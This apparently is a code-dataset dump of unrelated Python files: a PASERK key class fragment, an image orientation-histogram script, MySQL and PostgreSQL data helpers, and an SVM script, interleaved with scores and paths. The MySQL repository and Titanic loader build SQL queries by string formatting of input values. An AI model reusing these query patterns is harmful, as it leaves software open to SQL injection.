sealing_key: Union[bytes, str] = b"",
iteration: int = 100000,
memory_cost: int = 15 * 1024,
time_cost: int = 2,
parallelism: int = 1,
) -> str:
if wrapping_key and password:
raise ValueError("Only one of wrapping_key or password should be specified.")
if wrapping_key:
# secret-wrap
if not isinstance(self._key, EllipticCurvePrivateKey):
raise ValueError("Public key cannot be wrapped.")
bkey = wrapping_key if isinstance(wrapping_key, bytes) else wrapping_key.encode("utf-8")
h = "k3.secret-wrap.pie."
k = self._key.private_numbers().private_value.to_bytes(48, byteorder="big")
return h + self._encode_pie(h, bkey, k)
if password:
# secret-pw
if not isinstance(self._key, EllipticCurvePrivateKey):
raise ValueError("Public key cannot be wrapped.")
bpw = password if isinstance(password, bytes) else password.encode("utf-8")
h = "k3.secret-pw."
k = self._key.private_numbers().private_value.to_bytes(48, byteorder="big")
return h + self._encode_pbkw(h, bpw, k, iteration)
# public
if isinstance(self._key, EllipticCurvePublicKey):
k = ec_public_key_compress(self._key.public_numbers().x, self._key.public_numbers().y)
return "k3.public." + base64url_encode(k).decode("utf-8")
# private
k = self._key.private_numbers().private_value.to_bytes(48, byteorder="big")
return "k3.secret." + base64url_encode(k).decode("utf-8")
def to_paserk_id(self) -> str:
p = self.to_paserk()
h = "k3.pid." if isinstance(self._key, EllipticCurvePublicKey) else "k3.sid."
digest = hashes.Hash(hashes.SHA384())
digest.update((h + p).encode("utf-8"))
d = digest.finalize()
return h + base64url_encode(d[0:33]).decode("utf-8")
def sign(self, payload: bytes, footer: bytes = b"", implicit_assertion: bytes = b"") -> bytes:
if isinstance(self._key, EllipticCurvePublicKey):
raise ValueError("A public key cannot be used for signing.")
pk = ec_public_key_compress(
self._key.private_numbers().public_numbers.x,
self._key.private_numbers().public_numbers.y,
)
m2 = pae([pk, self.header, payload, footer, implicit_assertion])
try:
sig = self._key.sign(m2, ec.ECDSA(hashes.SHA384()))
return self._der_to_os(self._key.curve.key_size, sig)
except Exception as err:
raise SignError("Failed to sign.") from err
def verify(self, payload: bytes, footer: bytes = b"", implicit_assertion: bytes = b""):
if len(payload) <= self._sig_size:
raise ValueError("Invalid payload.")
sig = payload[-self._sig_size :]
m = payload[: len(payload) - self._sig_size]
k = self._key if isinstance(self._key, EllipticCurvePublicKey) else self._key.public_key()
pk = ec_public_key_compress(k.public_numbers().x, k.public_numbers().y)
m2 = pae([pk, self.header, m, footer, implicit_assertion])
try:
der_sig = self._os_to_der(self._key.curve.key_size, sig)
k.verify(der_sig, m2, ec.ECDSA(hashes.SHA384()))
except Exception as err:
raise VerifyError("Failed to verify.") from err
return m
def _der_to_os(self, key_size: int, sig: bytes) -> bytes:
num_bytes = (key_size + 7) // 8
r, s = decode_dss_signature(sig)
return i2osp(r, num_bytes) + i2osp(s, num_bytes)
def _os_to_der(self, key_size: int, sig: bytes) -> bytes:
num_bytes = (key_size + 7) // 8
if len(sig) != 2 * num_bytes:
raise ValueError("Invalid signature.")
r = os2ip(sig[:num_bytes])
s = os2ip(sig[num_bytes:])
return encode_dss_signature(r, s) | 0.76708 | 0.27036 |
import sys
import cv2 as cv
import numpy as np
def getGradient(image, sigma):
"""
Gradient magnitude calculation from lecture
Takes in image and sigma
Calculates gradient magnitudes and directions(angles) based on sigma
Returns magnitude and directions
"""
kernelSize = (int(4*sigma+1), int(4*sigma+1))
imgGauss = cv.GaussianBlur(image, kernelSize, sigma)
kx,ky = cv.getDerivKernels(1,1,3)
kx = np.transpose(kx/2)
ky = ky/2
imgDx = cv.filter2D(imgGauss,-1,kx)
imgDy = cv.filter2D(imgGauss,-1,ky)
imgGradient = np.sqrt(imgDx**2 + imgDy**2)
imgDir = np.arctan2(imgDy, imgDx)
imgDir = 180*imgDir/np.pi
return imgGradient, imgDir
def pixelNeighborhood(point, image, sigma):
"""
Takes in a point, an image, and sigma
Calculates the width from sigma and creates a pixel "neighborhood"
with the point as the center
Returns the neighborhood
"""
width = int(8*sigma)//2
x,y = point
neighborhood = image[x-width:x+width+1, y-width:y+width+1]
return neighborhood
def getWeights(mag, sigma):
"""
Takes in gradient magnitudes and sigma
Generates Gaussian kernel based on sigma
Creates 2D Gaussian kernel from outer product of the 1D kernel
Multiplies the magnitudes by the kernel to get the weights of the pixels
"""
gaussian = cv.getGaussianKernel(int(8*sigma+1), 2*sigma)
window = np.outer(gaussian,gaussian)
weights = mag * window
return weights
def assignBins(angles, weights):
"""
Takes in sorted angles(directions) and sorted weights
Goes through each bin center (i.e. -175, -165, etc.):
Gets the sum of the weights that fall in that bin
Adds the sum to a list that represented a histogram
i.e. bins has 36 slots with each slot a sum corresponding to each bin center
Return the histogram
"""
binCenters = np.arange(-175, 185, 10)
hist = []
for center in binCenters:
sum = getSum(angles, weights, center - 10, center + 10, center)
if (center == 175):
sum += getSum(angles, weights, -180, -175, -185)
elif (center == -175):
sum += getSum(angles, weights, 175, 180, 185)
hist.append(sum)
return hist
def getSum(angles, weights, start, end, center):
"""
Take in sorted list of angles, sorted list of weights, a start index,
an end index, and a center index
Gets the distance each angle is to the center
Calculates the percent of the weight that falls into that bin
Gets the indices of angles that fall between start and end
Get the weights at those indices (i.e. weights at those angles)
Multiply weights times the percentages and sum the result
Return the sum
"""
dist = np.abs(angles[(angles>=start) & (angles<=end)] - center)
percent = 1 - dist / 10
rangeInd = np.where((angles>=start) & (angles<=end))
sum = 0
if len(rangeInd[0]) != 0:
rangeStart = np.min(rangeInd)
rangeEnd = np.max(rangeInd) + 1
weightRange = weights[rangeStart:rangeEnd]
sum = (weightRange * percent).sum()
return sum
def smoothHistogram(hist):
"""
Take in histogram(bins with sum in each)
Iterates through and "smooths" the weight based on the weight of its
neighbor bins
Returns the smoothed histogram
"""
smoothedHist = []
for i in range(len(hist)):
if i == 0:
neighborWeights = hist[1] + hist[-1]
elif i == len(hist) - 1:
neighborWeights = hist[-2] + hist[0]
else:
neighborWeights = hist[i-1] + hist[i+1]
smoothWeight = (hist[i] + (neighborWeights/2))/2
smoothedHist.append(smoothWeight)
return smoothedHist
def findPeaks(hist):
"""
Take in histogram
Go through each bin in the histogram and:
Find local maximum and:
Fit a parabola around the two neighbor bins and local max bin
Calculate the critical point that produces the max of the parabola
(critical point represents orientation, max is the peak)
Add both to list of peaks
Return sorted list of peaks
"""
peaks = []
offsets = []
binRanges = np.arange(-175, 185, 10)
max = np.max(hist)
for i in range(len(hist)):
if i == 0:
left, right = -1, 1
elif i == len(hist) - 1:
left, right = -2, 0
else:
left, right = i-1, i+1
if (hist[i] - hist[left]) >= (0.01*max) \
and (hist[i] - hist[right]) >= (0.01*max):
a = (hist[right] - 2*hist[i] + hist[left]) / 2
b = (hist[right] - hist[left]) / 2
c = hist[i]
aDx = a*2
bDx = -1*b
#critical point
x = bDx/aDx
# max
max = a*(x**2) + b*x + c
offset = (x*10) + binRanges[i]
peaks.append((max, offset))
return sorted(peaks, reverse=True)
def output(point, num, histogram, smoothHistogram, peaks):
"""
Take in the point being evaluated, the number of that point, the histogram
calculated, the smoothed histogram, and the list of peaks
Output histogram and smoothed histogram info
Output peak info and strong orientation peak info
"""
print("\n Point {}: ({},{})\nHistograms:".format(num, point[0], point[1]))
binRanges = np.arange(-180, 190, 10)
for i in range(36):
br1, br2 = binRanges[i], binRanges[i+1]
h, sh = histogram[i], smoothHistogram[i]
print("[{},{}]: {:.2f} {:.2f}".format(br1, br2, h, sh))
maxPeak = 0
for i in range(len(peaks)):
peak, offset = peaks[i]
print("Peak {}: theta {:.1f}, value {:.2f}".format(i, offset, peak))
if peak > maxPeak:
maxPeak = peak
print("Number of strong orientation peaks: {}".format(strongPeaks(maxPeak, peaks)))
def strongPeaks(max, peaks):
"""
Take in max peak and other peaks
Count how many have a strong orientation (i.e. are 80% or above of the max)
Return the count
"""
strongPeaks = 0
for i in range(len(peaks)):
peak = peaks[i][0]
if peak >= 0.8*max:
strongPeaks += 1
return strongPeaks
if __name__ == "__main__":
"""
Handle command line arguments
"""
if len(sys.argv) != 4:
print("Correct usage: p2_compare.py sigma img points")
sys.exit()
else:
sig = sys.argv[1]
inImgName = sys.argv[2]
pointsFileName = sys.argv[3]
try:
sig = float(sig)
except ValueError:
print("Sigma must be real number!")
sys.exit()
try:
inImg = cv.imread(inImgName,0).astype(np.float64)
except AttributeError:
print("{} is not a valid image!".format(inImgName))
sys.exit()
try:
points = np.loadtxt(pointsFileName, dtype=np.uint16)
except ValueError:
print("Malformed points file: {}, must be numbers".format(pointsFile))
sys.exit()
"""
Iterate through all the points in the file:
Get gradient magnitudes and directions of whole image
Crop those magnitudes and directions down to neighborhood around point
Sort the directions and the weights (making sure each element still
corresponds to other element in the other list)
Assign bins (make histogram)
Smooth the histogram
Get the peaks
Output all the info
"""
for i in range(len(points)):
point = points[i]
gradientMag, gradientDir = getGradient(inImg, sig)
gradientMag = pixelNeighborhood(point, gradientMag, sig)
gradientDir = pixelNeighborhood(point, gradientDir, sig)
dirSort = np.sort(gradientDir, axis=None)
dirInd = np.argsort(gradientDir, axis=None)
weights = getWeights(gradientMag, sig).flatten()
weights = weights[dirInd]
bins = assignBins(dirSort, weights)
smoothedBins = smoothHistogram(bins)
peaks = findPeaks(smoothedBins)
output(points[i], i, bins, smoothedBins, peaks) | orientation/orientation.py | import sys
import cv2 as cv
import numpy as np
def getGradient(image, sigma):
"""
Gradient magnitude calculation from lecture
Takes in image and sigma
Calculates gradient magnitudes and directions(angles) based on sigma
Returns magnitude and directions
"""
kernelSize = (int(4*sigma+1), int(4*sigma+1))
imgGauss = cv.GaussianBlur(image, kernelSize, sigma)
kx,ky = cv.getDerivKernels(1,1,3)
kx = np.transpose(kx/2)
ky = ky/2
imgDx = cv.filter2D(imgGauss,-1,kx)
imgDy = cv.filter2D(imgGauss,-1,ky)
imgGradient = np.sqrt(imgDx**2 + imgDy**2)
imgDir = np.arctan2(imgDy, imgDx)
imgDir = 180*imgDir/np.pi
return imgGradient, imgDir
def pixelNeighborhood(point, image, sigma):
"""
Takes in a point, an image, and sigma
Calculates the width from sigma and creates a pixel "neighborhood"
with the point as the center
Returns the neighborhood
"""
width = int(8*sigma)//2
x,y = point
neighborhood = image[x-width:x+width+1, y-width:y+width+1]
return neighborhood
def getWeights(mag, sigma):
"""
Takes in gradient magnitudes and sigma
Generates Gaussian kernel based on sigma
Creates 2D Gaussian kernel from outer product of the 1D kernel
Multiplies the magnitudes by the kernel to get the weights of the pixels
"""
gaussian = cv.getGaussianKernel(int(8*sigma+1), 2*sigma)
window = np.outer(gaussian,gaussian)
weights = mag * window
return weights
def assignBins(angles, weights):
"""
Takes in sorted angles(directions) and sorted weights
Goes through each bin center (i.e. -175, -165, etc.):
Gets the sum of the weights that fall in that bin
Adds the sum to a list that represented a histogram
i.e. bins has 36 slots with each slot a sum corresponding to each bin center
Return the histogram
"""
binCenters = np.arange(-175, 185, 10)
hist = []
for center in binCenters:
sum = getSum(angles, weights, center - 10, center + 10, center)
if (center == 175):
sum += getSum(angles, weights, -180, -175, -185)
elif (center == -175):
sum += getSum(angles, weights, 175, 180, 185)
hist.append(sum)
return hist
def getSum(angles, weights, start, end, center):
"""
Take in sorted list of angles, sorted list of weights, a start index,
an end index, and a center index
Gets the distance each angle is to the center
Calculates the percent of the weight that falls into that bin
Gets the indices of angles that fall between start and end
Get the weights at those indices (i.e. weights at those angles)
Multiply weights times the percentages and sum the result
Return the sum
"""
dist = np.abs(angles[(angles>=start) & (angles<=end)] - center)
percent = 1 - dist / 10
rangeInd = np.where((angles>=start) & (angles<=end))
sum = 0
if len(rangeInd[0]) != 0:
rangeStart = np.min(rangeInd)
rangeEnd = np.max(rangeInd) + 1
weightRange = weights[rangeStart:rangeEnd]
sum = (weightRange * percent).sum()
return sum
def smoothHistogram(hist):
"""
Take in histogram(bins with sum in each)
Iterates through and "smooths" the weight based on the weight of its
neighbor bins
Returns the smoothed histogram
"""
smoothedHist = []
for i in range(len(hist)):
if i == 0:
neighborWeights = hist[1] + hist[-1]
elif i == len(hist) - 1:
neighborWeights = hist[-2] + hist[0]
else:
neighborWeights = hist[i-1] + hist[i+1]
smoothWeight = (hist[i] + (neighborWeights/2))/2
smoothedHist.append(smoothWeight)
return smoothedHist
def findPeaks(hist):
"""
Take in histogram
Go through each bin in the histogram and:
Find local maximum and:
Fit a parabola around the two neighbor bins and local max bin
Calculate the critical point that produces the max of the parabola
(critical point represents orientation, max is the peak)
Add both to list of peaks
Return sorted list of peaks
"""
peaks = []
offsets = []
binRanges = np.arange(-175, 185, 10)
max = np.max(hist)
for i in range(len(hist)):
if i == 0:
left, right = -1, 1
elif i == len(hist) - 1:
left, right = -2, 0
else:
left, right = i-1, i+1
if (hist[i] - hist[left]) >= (0.01*max) \
and (hist[i] - hist[right]) >= (0.01*max):
a = (hist[right] - 2*hist[i] + hist[left]) / 2
b = (hist[right] - hist[left]) / 2
c = hist[i]
aDx = a*2
bDx = -1*b
#critical point
x = bDx/aDx
# max
max = a*(x**2) + b*x + c
offset = (x*10) + binRanges[i]
peaks.append((max, offset))
return sorted(peaks, reverse=True)
def output(point, num, histogram, smoothHistogram, peaks):
"""
Take in the point being evaluated, the number of that point, the histogram
calculated, the smoothed histogram, and the list of peaks
Output histogram and smoothed histogram info
Output peak info and strong orientation peak info
"""
print("\n Point {}: ({},{})\nHistograms:".format(num, point[0], point[1]))
binRanges = np.arange(-180, 190, 10)
for i in range(36):
br1, br2 = binRanges[i], binRanges[i+1]
h, sh = histogram[i], smoothHistogram[i]
print("[{},{}]: {:.2f} {:.2f}".format(br1, br2, h, sh))
maxPeak = 0
for i in range(len(peaks)):
peak, offset = peaks[i]
print("Peak {}: theta {:.1f}, value {:.2f}".format(i, offset, peak))
if peak > maxPeak:
maxPeak = peak
print("Number of strong orientation peaks: {}".format(strongPeaks(maxPeak, peaks)))
def strongPeaks(max, peaks):
"""
Take in max peak and other peaks
Count how many have a strong orientation (i.e. are 80% or above of the max)
Return the count
"""
strongPeaks = 0
for i in range(len(peaks)):
peak = peaks[i][0]
if peak >= 0.8*max:
strongPeaks += 1
return strongPeaks
if __name__ == "__main__":
"""
Handle command line arguments
"""
if len(sys.argv) != 4:
print("Correct usage: p2_compare.py sigma img points")
sys.exit()
else:
sig = sys.argv[1]
inImgName = sys.argv[2]
pointsFileName = sys.argv[3]
try:
sig = float(sig)
except ValueError:
print("Sigma must be real number!")
sys.exit()
try:
inImg = cv.imread(inImgName,0).astype(np.float64)
except AttributeError:
print("{} is not a valid image!".format(inImgName))
sys.exit()
try:
points = np.loadtxt(pointsFileName, dtype=np.uint16)
except ValueError:
print("Malformed points file: {}, must be numbers".format(pointsFile))
sys.exit()
"""
Iterate through all the points in the file:
Get gradient magnitudes and directions of whole image
Crop those magnitudes and directions down to neighborhood around point
Sort the directions and the weights (making sure each element still
corresponds to other element in the other list)
Assign bins (make histogram)
Smooth the histogram
Get the peaks
Output all the info
"""
for i in range(len(points)):
point = points[i]
gradientMag, gradientDir = getGradient(inImg, sig)
gradientMag = pixelNeighborhood(point, gradientMag, sig)
gradientDir = pixelNeighborhood(point, gradientDir, sig)
dirSort = np.sort(gradientDir, axis=None)
dirInd = np.argsort(gradientDir, axis=None)
weights = getWeights(gradientMag, sig).flatten()
weights = weights[dirInd]
bins = assignBins(dirSort, weights)
smoothedBins = smoothHistogram(bins)
peaks = findPeaks(smoothedBins)
output(points[i], i, bins, smoothedBins, peaks) | 0.653238 | 0.735475 |
import sys
from fun import public
import pymysql
from settings import config
class DBConnection:
def __init__(self):
self.__conn_dict = config.wk_mysql_default_conn
self.conn = None
self.cursor = None
def connect(self, cursor=pymysql.cursors.DictCursor):
# 创建数据库连接
self.conn = pymysql.connect(**self.__conn_dict)
# 创建游标
self.cursor = self.conn.cursor(cursor=cursor)
return self.cursor
def close(self):
self.conn.commit()
self.cursor.close()
self.conn.close()
class ApplyRepository:
def __init__(self):
self.conn = DBConnection()
def handel_query(self,limit = '', *args, **kwargs):
cursor = self.conn.connect()
try:
limit = int(limit)
except Exception:
limit = 1
if len(args) == 0 :
columns = '*'
else:
columns = str(args).replace('(','').replace(')','').replace("'",'')[:-1]
is_null = ''
condition = ''
for k, v in kwargs.items():
is_null += v
if is_null == '':
sql = " select %s from apply order by update_time desc limit 100; " % (columns)
else:
for k, v in kwargs.items():
condition += " %s = '%s' and " % (k, v)
sql = " select %s from apply where %s " % (columns, condition)
sql = sql.strip()[:-4]
sql = sql + ' order by create_time desc limit 1;'
public.log_record('查询申请单信息:', sys._getframe().f_lineno,sql)
cursor.execute(sql)
if limit >1:
results = cursor.fetchall()
else:
results =cursor.fetchone()
return results
self.conn.close()
def handel_delete(self,apply_id):
cursor = self.conn.connect()
sql = " delete from apply where apply_id = '%s' ; "%apply_id
cursor.execute(sql)
self.conn.close()
def handel_update(self,**kwargs):
cursor = self.conn.connect()
sql = " update apply set %s = '%s' where apply_id = '%s' ;"
for k,v in kwargs.items():
new_sql = sql%(k,v,kwargs['apply_id'])
public.log_record('修改申请单状态:',sys._getframe().f_lineno,new_sql)
cursor.execute(new_sql)
self.conn.close()
class AttachmentRepository:
def __init__(self):
self.conn = DBConnection()
def handel_query(self, *args, **kwargs):
cursor = self.conn.connect()
if len(args) == 0 :
columns = '*'
else:
columns = str(args).replace('(','').replace(')','').replace("'",'')[:-1]
is_null = ''
condition = ''
for k, v in kwargs.items():
is_null += v
if is_null == '':
sql = " select %s from attachment ; " % (columns)
else:
for k, v in kwargs.items():
condition += " %s = '%s' and " % (k, v)
sql = " select %s from attachment where %s " % (columns, condition)
sql = sql.strip()[:-4]+';'
public.log_record('查询影像附件信息:', sys._getframe().f_lineno,sql)
cursor.execute(sql)
results = cursor.fetchall()
self.conn.close()
return results
class ApplyToCuBaseInfoRepository:
def __init__(self):
self.conn = DBConnection()
def handel_query(self, *args, **kwargs):
cursor = self.conn.connect()
if len(args) == 0:
columns = '*'
else:
columns = str(args).replace('(', '').replace(')', '').replace("'", '')[:-1]
is_null = ''
condition = ''
for k, v in kwargs.items():
is_null += v
if is_null == '':
sql = """
select %s from apply t1,cu_base_info t2
where t1.apply_id = t2.apply_id
order by t1.create_time desc
limit 1;
""" %(columns)
else:
for k, v in kwargs.items():
condition += " %s = '%s' and " % (k, v)
sql = """
select %s from apply t1,cu_base_info t2
where t1.apply_id = t2.apply_id
and %s
""" % (columns,condition)
sql = sql.strip()[:-4]
sql = sql + ' order by t1.create_time desc limit 1;'
public.log_record('查询申请信息及客户信息:', sys._getframe().f_lineno, sql)
cursor.execute(sql)
result = cursor.fetchone()
self.conn.close()
return result
if __name__ == '__main__':
pass | auto/wpt_interface_test/fun/wk_db_server.py |
import sys
from fun import public
import pymysql
from settings import config
class DBConnection:
def __init__(self):
self.__conn_dict = config.wk_mysql_default_conn
self.conn = None
self.cursor = None
def connect(self, cursor=pymysql.cursors.DictCursor):
# 创建数据库连接
self.conn = pymysql.connect(**self.__conn_dict)
# 创建游标
self.cursor = self.conn.cursor(cursor=cursor)
return self.cursor
def close(self):
self.conn.commit()
self.cursor.close()
self.conn.close()
class ApplyRepository:
def __init__(self):
self.conn = DBConnection()
def handel_query(self,limit = '', *args, **kwargs):
cursor = self.conn.connect()
try:
limit = int(limit)
except Exception:
limit = 1
if len(args) == 0 :
columns = '*'
else:
columns = str(args).replace('(','').replace(')','').replace("'",'')[:-1]
is_null = ''
condition = ''
for k, v in kwargs.items():
is_null += v
if is_null == '':
sql = " select %s from apply order by update_time desc limit 100; " % (columns)
else:
for k, v in kwargs.items():
condition += " %s = '%s' and " % (k, v)
sql = " select %s from apply where %s " % (columns, condition)
sql = sql.strip()[:-4]
sql = sql + ' order by create_time desc limit 1;'
public.log_record('查询申请单信息:', sys._getframe().f_lineno,sql)
cursor.execute(sql)
if limit >1:
results = cursor.fetchall()
else:
results =cursor.fetchone()
return results
self.conn.close()
def handel_delete(self,apply_id):
cursor = self.conn.connect()
sql = " delete from apply where apply_id = '%s' ; "%apply_id
cursor.execute(sql)
self.conn.close()
def handel_update(self,**kwargs):
cursor = self.conn.connect()
sql = " update apply set %s = '%s' where apply_id = '%s' ;"
for k,v in kwargs.items():
new_sql = sql%(k,v,kwargs['apply_id'])
public.log_record('修改申请单状态:',sys._getframe().f_lineno,new_sql)
cursor.execute(new_sql)
self.conn.close()
class AttachmentRepository:
def __init__(self):
self.conn = DBConnection()
def handel_query(self, *args, **kwargs):
cursor = self.conn.connect()
if len(args) == 0 :
columns = '*'
else:
columns = str(args).replace('(','').replace(')','').replace("'",'')[:-1]
is_null = ''
condition = ''
for k, v in kwargs.items():
is_null += v
if is_null == '':
sql = " select %s from attachment ; " % (columns)
else:
for k, v in kwargs.items():
condition += " %s = '%s' and " % (k, v)
sql = " select %s from attachment where %s " % (columns, condition)
sql = sql.strip()[:-4]+';'
public.log_record('查询影像附件信息:', sys._getframe().f_lineno,sql)
cursor.execute(sql)
results = cursor.fetchall()
self.conn.close()
return results
class ApplyToCuBaseInfoRepository:
def __init__(self):
self.conn = DBConnection()
def handel_query(self, *args, **kwargs):
cursor = self.conn.connect()
if len(args) == 0:
columns = '*'
else:
columns = str(args).replace('(', '').replace(')', '').replace("'", '')[:-1]
is_null = ''
condition = ''
for k, v in kwargs.items():
is_null += v
if is_null == '':
sql = """
select %s from apply t1,cu_base_info t2
where t1.apply_id = t2.apply_id
order by t1.create_time desc
limit 1;
""" %(columns)
else:
for k, v in kwargs.items():
condition += " %s = '%s' and " % (k, v)
sql = """
select %s from apply t1,cu_base_info t2
where t1.apply_id = t2.apply_id
and %s
""" % (columns,condition)
sql = sql.strip()[:-4]
sql = sql + ' order by t1.create_time desc limit 1;'
public.log_record('查询申请信息及客户信息:', sys._getframe().f_lineno, sql)
cursor.execute(sql)
result = cursor.fetchone()
self.conn.close()
return result
if __name__ == '__main__':
pass | 0.177775 | 0.137504 |
import pandas as pd
import psycopg2
import os
from dotenv import load_dotenv
load_dotenv()
USER = os.getenv('USER')
PASSWORD = os.getenv('PASSWORD')
df_titanic = pd.read_csv('titanic.csv')
# get columns names for PostGreSQL database
columns = ['Survived', 'Pclass', 'Name', 'Sex', 'Age', 'Siblings/Spouses Aboard',
'Parents/Children Aboard', 'Fare']
# clean the names of any ' that may become an issue in passing queries
df_titanic['Name'] = df_titanic['Name'].apply(lambda x: str.replace(x, "'", ""))
# connect with Elephant PostGres DB and send a cursor
pg_conn = psycopg2.connect(dbname='mlrgffyq',
user=USER,
password=PASSWORD,
host='queenie.db.elephantsql.com')
# send cursor
pg_curs = pg_conn.cursor()
# check connection by sending a query to the DB and retrieve result
query = 'SELECT * FROM character_sqlite'
pg_curs.execute(query)
results = pg_curs.fetchall()
# print(results)
# connecting well. Now export create and export df_titanic line by line and ETL(Extract, Transform and Load)
# make a new table, delete if similar name table exists
query = """
drop table IF exists titanic;
-- All in " " to make sure column names are capitalized
create table titanic
(
"Survived" int,
"Pclass" int,
"Name" varchar(90),
"Sex" varchar(7),
"Age" float4,
"Siblings/Spouses Aboard" int,
"Parents/Children Aboard" int,
"Fare" float8
);
"""
pg_curs.execute(query)
# Make a list of dataframe rows to insert line by line
new_list = []
new_list = df_titanic.values.tolist()
print(','.join(map(str, new_list[0])))
# Loop to add dataframe rows as queries
for i in range(len(df_titanic)):
query = f"""INSERT INTO titanic ({'"' + '", "'.join(columns) + '"'}) VALUES ({"'" + "', '".join(map(str, new_list[i])) + "'"})"""
# uncomment for verbose
# print(f'inserting {query}')
# print(f'OK {i} of {len(df_titanic)}')
pg_curs.execute(query)
pg_conn.commit()
# Test table
character_query = '''SELECT * FROM titanic'''
pg_curs.execute(character_query)
results = pg_curs.fetchall()
print(results)
print(f'COMPLETE!')
# Close connection
pg_conn.close()
print(f'CLOSED!') | module2-sql-for-analysis/assignment/insert_titanic.py | import pandas as pd
import psycopg2
import os
from dotenv import load_dotenv
load_dotenv()
USER = os.getenv('USER')
PASSWORD = os.getenv('PASSWORD')
df_titanic = pd.read_csv('titanic.csv')
# get columns names for PostGreSQL database
columns = ['Survived', 'Pclass', 'Name', 'Sex', 'Age', 'Siblings/Spouses Aboard',
'Parents/Children Aboard', 'Fare']
# clean the names of any ' that may become an issue in passing queries
df_titanic['Name'] = df_titanic['Name'].apply(lambda x: str.replace(x, "'", ""))
# connect with Elephant PostGres DB and send a cursor
pg_conn = psycopg2.connect(dbname='mlrgffyq',
user=USER,
password=PASSWORD,
host='queenie.db.elephantsql.com')
# send cursor
pg_curs = pg_conn.cursor()
# check connection by sending a query to the DB and retrieve result
query = 'SELECT * FROM character_sqlite'
pg_curs.execute(query)
results = pg_curs.fetchall()
# print(results)
# connecting well. Now export create and export df_titanic line by line and ETL(Extract, Transform and Load)
# make a new table, delete if similar name table exists
query = """
drop table IF exists titanic;
-- All in " " to make sure column names are capitalized
create table titanic
(
"Survived" int,
"Pclass" int,
"Name" varchar(90),
"Sex" varchar(7),
"Age" float4,
"Siblings/Spouses Aboard" int,
"Parents/Children Aboard" int,
"Fare" float8
);
"""
pg_curs.execute(query)
# Make a list of dataframe rows to insert line by line
new_list = []
new_list = df_titanic.values.tolist()
print(','.join(map(str, new_list[0])))
# Loop to add dataframe rows as queries
for i in range(len(df_titanic)):
query = f"""INSERT INTO titanic ({'"' + '", "'.join(columns) + '"'}) VALUES ({"'" + "', '".join(map(str, new_list[i])) + "'"})"""
# uncomment for verbose
# print(f'inserting {query}')
# print(f'OK {i} of {len(df_titanic)}')
pg_curs.execute(query)
pg_conn.commit()
# Test table
character_query = '''SELECT * FROM titanic'''
pg_curs.execute(character_query)
results = pg_curs.fetchall()
print(results)
print(f'COMPLETE!')
# Close connection
pg_conn.close()
print(f'CLOSED!') | 0.135146 | 0.132908 |
import argparse
import pickle
import numpy as np
import pandas as pd
from sklearn import svm
from sklearn.model_selection import cross_validate
from definitions import TISSUES
# python -u 05_01_svms_communities.py --tissue_num NUM | tee outputs/output_05_01_NUM.txt
def calculate_svm(tissue_name):
corr_mat = pd.read_pickle("data/corr_" + tissue_name + ".pkl")
communities = pickle.load(open("results/louvain_modules_" + tissue_name + ".pkl", "rb"))
community_id = 0
# For each community found in each tissue
for community in np.unique(communities[0]):
common = [x for x in all_df.columns.values if x in np.array(corr_mat.columns)[communities[0] == community]]
# Communitites of size 3 or less are considered small
if len(common) <= 3:
continue
filtered_df = all_df.loc[:, common]
filtered_w_tissue = filtered_df.join(all_df['tissue'])
dic_community = {}
dic_community['genes'] = common
community_id += 1
X = filtered_w_tissue.loc[:, common].values
for f_name in sorted(TISSUES):
print("-- Predicting " + f_name + " with " + tissue_name + " community " + str(community_id))
y = filtered_w_tissue.loc[:, 'tissue'].copy().values
for j, elem in enumerate(y):
if elem == "_" + f_name:
y[j] = 1
else:
y[j] = 0
dic_community[f_name] = {}
scoring = ['accuracy', 'f1', 'roc_auc']
clf = svm.SVC(kernel='linear', class_weight="balanced")
scores = cross_validate(clf, X, list(y), cv=3, scoring=scoring, n_jobs=-1)
score = scores['test_accuracy']
dic_community[f_name]['acc'] = score.mean()
dic_community[f_name]['acc_std'] = score.std()
print("Accuracy: %.4f (%.4f)" % (score.mean(), score.std()))
score = scores['test_f1']
dic_community[f_name]['f1'] = score.mean()
dic_community[f_name]['f1_std'] = score.std()
print("F1 score: %.4f (%.4f)" % (score.mean(), score.std()))
score = scores['test_roc_auc']
dic_community[f_name]['roc'] = score.mean()
dic_community[f_name]['roc_std'] = score.std()
print("ROC AUC: %.4f (%.4f)" % (score.mean(), score.std()))
pickle.dump(dic_community, open("svm_results/" + tissue_name + '_' + str(community_id) + ".pkl", "wb"))
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument("--tissue_num", type=int,
help='Tissue number in the TISSUES array (from definitions module), on which the code will be executed')
args = parser.parse_args()
print("Going with", TISSUES[args.tissue_num])
# Creating the whole table
all_pandas = []
for f_name in sorted(TISSUES):
pd_tmp = pd.read_csv("data_filtered/only_geneids_CORRECTED_" + f_name + ".csv", index_col=0)
pd_tmp.rename(index=lambda x: x + "_" + f_name, inplace=True)
all_pandas.append(pd_tmp)
all_df = pd.concat(all_pandas, sort=False)
# Manually making the scaling because of NaNs
all_df = all_df.sub(all_df.min()).div((all_df.max() - all_df.min()))
all_df.fillna(0, inplace=True)
# Adding tissue information to the dataframe
def label_race(row):
splitted = row.name.split('_')
term = ""
for i in range(1, len(splitted)):
term += "_" + splitted[i]
return term
all_df['tissue'] = all_df.apply(lambda row: label_race(row), axis=1)
calculate_svm(TISSUES[args.tissue_num]) | 05_01_svms_communities.py | import argparse
import pickle
import numpy as np
import pandas as pd
from sklearn import svm
from sklearn.model_selection import cross_validate
from definitions import TISSUES
# python -u 05_01_svms_communities.py --tissue_num NUM | tee outputs/output_05_01_NUM.txt
def calculate_svm(tissue_name):
corr_mat = pd.read_pickle("data/corr_" + tissue_name + ".pkl")
communities = pickle.load(open("results/louvain_modules_" + tissue_name + ".pkl", "rb"))
community_id = 0
# For each community found in each tissue
for community in np.unique(communities[0]):
common = [x for x in all_df.columns.values if x in np.array(corr_mat.columns)[communities[0] == community]]
# Communitites of size 3 or less are considered small
if len(common) <= 3:
continue
filtered_df = all_df.loc[:, common]
filtered_w_tissue = filtered_df.join(all_df['tissue'])
dic_community = {}
dic_community['genes'] = common
community_id += 1
X = filtered_w_tissue.loc[:, common].values
for f_name in sorted(TISSUES):
print("-- Predicting " + f_name + " with " + tissue_name + " community " + str(community_id))
y = filtered_w_tissue.loc[:, 'tissue'].copy().values
for j, elem in enumerate(y):
if elem == "_" + f_name:
y[j] = 1
else:
y[j] = 0
dic_community[f_name] = {}
scoring = ['accuracy', 'f1', 'roc_auc']
clf = svm.SVC(kernel='linear', class_weight="balanced")
scores = cross_validate(clf, X, list(y), cv=3, scoring=scoring, n_jobs=-1)
score = scores['test_accuracy']
